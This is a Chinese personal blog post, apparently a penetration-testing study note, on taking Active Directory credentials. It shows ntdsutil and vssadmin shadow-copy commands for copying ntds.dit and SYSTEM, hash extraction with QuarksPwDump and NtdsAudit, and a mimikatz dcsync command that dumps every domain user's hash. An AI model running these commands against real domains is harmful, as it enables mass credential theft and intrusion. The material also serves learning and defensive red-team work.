<!DOCTYPE html><html lang="zh-CN"><head><meta charset="utf-8"><meta name="X-UA-Compatible" content="IE=edge"><meta name="author" content="Sally"><title>域内密码凭证获取 · Sally's Blog</title><meta name="description" content="Volume Shadow Copy活动目录数据库ntds.dit：活动目录数据库，包括有关域用户、组和组成员身份的信息。它还包括域中所有用户的密码哈希值。
为了保护密码哈希值，使用存储在SYSTEM注册表配置单元中的密钥对这些哈希值进行加密。因此想要破解sam文件与ntds.dit文件都需要拥有一"><meta name="keywords" content="Blog,博客,Hexo"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="renderer" content="webkit"><link rel="shortcut icon" type="image/x-icon" href="/images/favicon.webp"><link rel="stylesheet" href="/css/style.css"><link rel="stylesheet" href="/css/blog_basic.css"><link rel="stylesheet" href="/css/font-awesome.min.css"><link rel="stylesheet" href="/css/insight.css"><link rel="stylesheet" href="/css/search.css"><link rel="alternate" type="application/atom+xml" title="ATOM 1.0" href="/atom.xml"><script src="/js/jquery.js"></script><meta name="generator" content="Hexo 6.3.0"></head><body><div class="page-top animated fadeInDown"><div class="nav"><li> <a href="/">主页</a></li><li> <a href="/archives">归档</a></li><li> <a href="/tags">标签</a></li><li> <a href="/about">关于</a></li><li> <a href="/links">友链</a></li></div><div class="information"><div class="nav_right_btn"><li><a class="fa fa-chevron-left" onclick="window.history.go(-1)"> </a></li><li><a class="fa fa-search" onclick="openWindow();"></a></li></div><div class="avatar"><img src="/images/kabi.jpg"></div></div></div><div class="sidebar animated fadeInDown"><div class="sidebar-top"><div class="logo-title"><div class="title"><img src="/images/kabi.jpg" style="width:220px;" alt="favicon"><h3 title=""><a href="/">Sally's Blog</a></h3><div class="description"><p>A simple and beautiful blog</p></div></div><ul class="social-links"><li><a target="_blank" rel="noopener" href="https://github.com/phoenixmerk"><i class="fa fa-github"></i></a></li><li><a href="mailto:yourname@example.com"><i class="fa fa-envelope"></i></a></li><li><a target="_blank" rel="noopener" href="https://zhihu.com/people/jin-xin-4-68"><i class="fa fa-mortar-board"></i></a></li></ul><iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width="220" height="86" src="//music.163.com/outchain/player?type=2&amp;id=1293913379&amp;auto=1&amp;height=66&amp;&amp;loop=1"></iframe></div></div><div class="footer"><div class="p"> <span> 全站CC-BY-SA-3.0 </span><i class="fa fa-star"></i><span> Sally</span></div><div class="by_farbox"><span>Powered by </span><a href="https://hexo.io/zh-cn/" target="_blank">Hexo </a><span> & </span><span>Anatolo </span></div><div class="beian"></div></div></div><div class="main"><div class="autopagerize_page_element"><div class="content"><div class="post-page"><div class="post animated fadeInDown"><div class="post-title"><h3><a>域内密码凭证获取</a></h3></div><div class="post-content"><p><p><a href="https://phoenixmerk.github.io/"><img src="https://img.shields.io/badge/%E4%BD%9C%E8%80%85-Sally-blue.svg"></a></p>
<h2 id="Volume-Shadow-Copy"><a href="#Volume-Shadow-Copy" class="headerlink" title="Volume Shadow Copy"></a>Volume Shadow Copy</h2><h3 id="活动目录数据库"><a href="#活动目录数据库" class="headerlink" title="活动目录数据库"></a>活动目录数据库</h3><p>ntds.dit：活动目录数据库，包括有关域用户、组和组成员身份的信息。它还包括域中所有用户的密码哈希值。</p>
<p>为了保护密码哈希值，使用存储在SYSTEM注册表配置单元中的密钥对这些哈希值进行加密。因此想要破解sam文件与ntds.dit文件都需要拥有一个system文件。</p>
<p>AD DS数据存储：</p>
<ul>
<li>由ntds.dit文件构成</li>
<li>默认存储在所有<strong>域控制器</strong>上的%SystemRoot%\NTDS文件夹中</li>
<li>只能通过域控制器进程和协议访问</li>
<li>由于<strong>Windows阻止对这些文件的标准读取或复制操作</strong>，因此必须使用特殊技术来获取副本。</li>
</ul>
<h3 id="Volume-Shadow-Copy-1"><a href="#Volume-Shadow-Copy-1" class="headerlink" title="Volume Shadow Copy"></a>Volume Shadow Copy</h3><p>Volume Shadow Copy Service是微软从Windows XP开始提供的用于创建<strong>一致性的时间点副本</strong>的服务框架。</p>
<ul>
<li>用于数据备份</li>
<li>支持WindowsServer2003及以上操作系统</li>
<li>系统默认在特定条件下自动创建数据备份，如补丁安装后。在Win7系统大概每隔一周自动创建备份无法确定</li>
<li>禁用VSS会影响系统正常使用，如System Restore和Windows Server Backup</li>
</ul>
<h3 id="Ntdsutil"><a href="#Ntdsutil" class="headerlink" title="Ntdsutil"></a>Ntdsutil</h3><p>Ntdsutil.exe：一个为AD提供管理设施的命令行工具，域环境默认安装</p>
<p><strong>交互式操作</strong></p>
<p><img src="https://merk11-cnblog.oss-cn-beijing.aliyuncs.com/blogimg/image-20230601195112234.png" alt="image-20230601195112234"></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">ntdsutil 进入交互界面</span><br><span class="line">snapshot 创建快照</span><br><span class="line">activate instance ntds 创建实例</span><br><span class="line">create 创建快照</span><br><span class="line">返回了一串快照集guid</span><br><span class="line">mount [guid] 装载到C盘</span><br><span class="line">unmount [guid] 卸载快照</span><br><span class="line">del [guid] 删除快照</span><br><span class="line">quit</span><br></pre></td></tr></table></figure>

<p><img src="https://merk11-cnblog.oss-cn-beijing.aliyuncs.com/blogimg/image-20230601195335841.png" alt="image-20230601195335841"></p>
<p>效果上看是创建了一个 C盘的快照，但是却发现原本无法复制的存放Hash的文件可以复制和打开了</p>
<p><img src="https://merk11-cnblog.oss-cn-beijing.aliyuncs.com/blogimg/image-20230601195703368.png" alt="image-20230601195703368"></p>
<p><strong>非交互式操作</strong></p>
<p>查询当前系统的快照</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ntdsutil snapshot <span class="string">&quot;List All&quot;</span> quit quit</span><br><span class="line">ntdsutil snapshot <span class="string">&quot;List Mounted&quot;</span> quit quit</span><br></pre></td></tr></table></figure>

<p>创建快照</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ntdsutil snapshot <span class="string">&quot;activate instance ntds&quot;</span> create quit quit</span><br></pre></td></tr></table></figure>

<p>挂载快照</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ntdsutil snapshot  <span class="string">&quot;mounted [guid]&quot;</span> quit quit</span><br></pre></td></tr></table></figure>

<p>卸载快照</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ntdsutil snapshot  <span class="string">&quot;unmounted [guid]&quot;</span> quit quit</span><br></pre></td></tr></table></figure>

<p>删除快照</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ntdsutil snapshot  <span class="string">&quot;del [guid]&quot;</span> quit quit</span><br></pre></td></tr></table></figure>

<p><strong>交互式</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">ntdsutil 进入交互界面</span><br><span class="line">activate instance ntds 创建实例</span><br><span class="line">ifm 使用ifm</span><br><span class="line">create full &lt;Drive&gt;:\&lt;Folder&gt; 指定驱动器和文件夹</span><br><span class="line">quit</span><br><span class="line">quit</span><br></pre></td></tr></table></figure>

<p><strong>非交互式</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ntdsutil <span class="string">&quot;activate instance ntds&quot;</span> create full &lt;Drive&gt;:\&lt;Folder&gt; quit quit</span><br></pre></td></tr></table></figure>

<h3 id="vssadmin"><a href="#vssadmin" class="headerlink" title="vssadmin"></a>vssadmin</h3><p>VssAdmin：是Windows系统提供的卷景影复制服务VsS)的管理工具，域环境默认安装</p>
<ul>
<li>用于创建或删除卷影副本，列出卷影副本的信息</li>
<li>用于显示所有安装的所有卷影副本写入程序和提供程序</li>
<li>改变卷影副本存储空间的大小等</li>
</ul>
<p>查询当前系统的快照</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">vssadmin list shadows</span><br></pre></td></tr></table></figure>

<p>创建快照</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">vssadmin create shadow /for=C</span><br></pre></td></tr></table></figure>

<p>获得Shadow Copy Volume Name</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">\\?GLOBALROOT\Device\HarddiskVolumeShadowCopy10</span><br></pre></td></tr></table></figure>

<p>复制快照</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">copy \\?GLOBALROOT\Device\HarddiskVolumeShadowCopy10 [保存路径]</span><br></pre></td></tr></table></figure>

<p>删除快照</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">vssadmin delete shadows /for=C /queit</span><br></pre></td></tr></table></figure>

<h3 id="痕迹"><a href="#痕迹" class="headerlink" title="痕迹"></a>痕迹</h3><p><img src="https://merk11-cnblog.oss-cn-beijing.aliyuncs.com/blogimg/image-20230601202415613.png" alt="image-20230601202415613"></p>
<p>无法直接访问，需要创建符号链接进行访问</p>
<p><img src="https://merk11-cnblog.oss-cn-beijing.aliyuncs.com/blogimg/image-20230601202501253.png" alt="image-20230601202501253"></p>
<h2 id="解密ntds-dit"><a href="#解密ntds-dit" class="headerlink" title="解密ntds.dit"></a>解密ntds.dit</h2><h3 id="QuarkPwDump"><a href="#QuarkPwDump" class="headerlink" title="QuarkPwDump"></a>QuarkPwDump</h3><p>QuarksPwDump是一款开放源代码的Windows用户凭据提取工具，它可以抓取windows平台下多种类型的用户凭据，包括：本地帐户、域帐户、缓存的域帐户和Bitlocker。</p>
<p>1.修复复制出来的数据库文件</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">esentutl /p /o ntds.dit</span><br></pre></td></tr></table></figure>

<p>2.使用QuarksPwDump直接读取信息并将结果导出至文件</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">QuarksPwDump.exe --dump-hash-domain --output [输出文件名] --ntds-file ntds.dit</span><br></pre></td></tr></table></figure>

<h3 id="NtdsAudit"><a href="#NtdsAudit" class="headerlink" title="NtdsAudit"></a>NtdsAudit</h3><p>NtdsAudit可以十分高效的破解ntds文件并将全部域用户信息导出方便查找域用户状态.</p>
<p>将ntds.dit文件和SYSTEM文件放在同一自录下执行命令</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">NtdsAudit.exe <span class="string">&quot;ntds.dit&quot;</span> -s <span class="string">&quot;system.hive&quot;</span>-p pwdump.txt --users-csv users.csv</span><br></pre></td></tr></table></figure>

<h3 id="mimikatz-通常直接用cobaltstrike"><a href="#mimikatz-通常直接用cobaltstrike" class="headerlink" title="mimikatz(通常直接用cobaltstrike)"></a>mimikatz(通常直接用cobaltstrike)</h3><p>通过dcsync直接获取mingy域内所有用户hash</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz lsadump:dcsync /domain:[域名] /all/csv</span><br></pre></td></tr></table></figure>

<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>许多没法进行复制或打开的文件，可以通过创建快照的方式来创建副本，于是可以进行复制和打开，sam文件、ntds.dit文件、system文件的获取就是如此，利用了卷影的机制。</p>
</p><div class="tip">本文采用CC-BY-SA-3.0协议，转载请注明出处<br>Author: Sally</div></div><div class="post-footer"><div class="meta"><div class="info"><i class="fa fa-sun-o"></i><span class="date">2023-06-04</span><i class="fa fa-tag"></i><a class="tag" href="/tags/内网渗透/" title="内网渗透">内网渗透 </a><span class="leancloud_visitors"></span><span>About1038words, 3min27secread</span></div></div></div></div><div class="share"><div class="evernote"><a class="fa fa-bookmark" href="" onclick="javascript:join_favorite()" ref="sidebar"></a></div><div class="weibo"><a class="fa fa-weibo" href="javascript:void((function(s,d,e){try{}catch(e){}var f='http://service.weibo.com/share/share.php?',u=d.location.href,p=['url=',e(u),'&amp;title=',e(d.title),'&amp;appkey=2924220432'].join('');function a(){if(!window.open([f,p].join(''),'mb',['toolbar=0,status=0,resizable=1,width=620,height=450,left=',(s.width-620)/2,',top=',(s.height-450)/2].join('')))u.href=[f,p].join('');};if(/Firefox/.test(navigator.userAgent)){setTimeout(a,0)}else{a()}})(screen,document,encodeURIComponent));"></a></div><div class="twitter"><a class="fa fa-twitter" target="_blank" rel="noopener" href="http://twitter.com/home?status=,https://phoenixmerk.github.io/2023/06/04/域内密码凭证获取/,Sally's Blog,域内密码凭证获取,;"></a></div></div><div class="pagination"><ul class="clearfix"><li class="pre pagbuttons"><a class="btn" role="navigation" href="/2023/06/06/%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87/" title="权限提升">Post Anterior</a></li><li class="next pagbuttons"><a class="btn" role="navigation" href="/2023/06/04/%E6%8A%A4%E7%BD%91%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94/" title="护网应急响应（绿盟）">Próximo post</a></li></ul></div><script src="/js/visitors.js"></script></div></div></div></div><script src="/js/jquery-migrate-1.2.1.min.js"></script><script src="/js/jquery.appear.js"></script><script src="/js/add-bookmark.js"></script><script>(function(window){var INSIGHT_CONFIG={TRANSLATION:{POSTS:"Posts",PAGES:"Pages",CATEGORIES:"Categories",TAGS:"Tags",UNTITLED:"(Untitled)",},CONTENT_URL:"/content.json",};window.INSIGHT_CONFIG=INSIGHT_CONFIG})(window);</script><script src="/js/insight.js" defer></script><div class="searchbox ins-search"><div class="searchbox-container ins-search-container"><div class="searchbox-input-wrapper"><input class="searchbox-input ins-search-input" type="text" placeholder="Search..."><span class="searchbox-close"><a class="fa fa-times-circle" onclick="closeWindow();"></a></span></div><div class="searchbox-result-wrapper ins-section-wrapper"><div class="ins-section-container"><p>Seraching...</p></div></div></div></div><script src="/js/baidu-tongji.js"></script></body></html>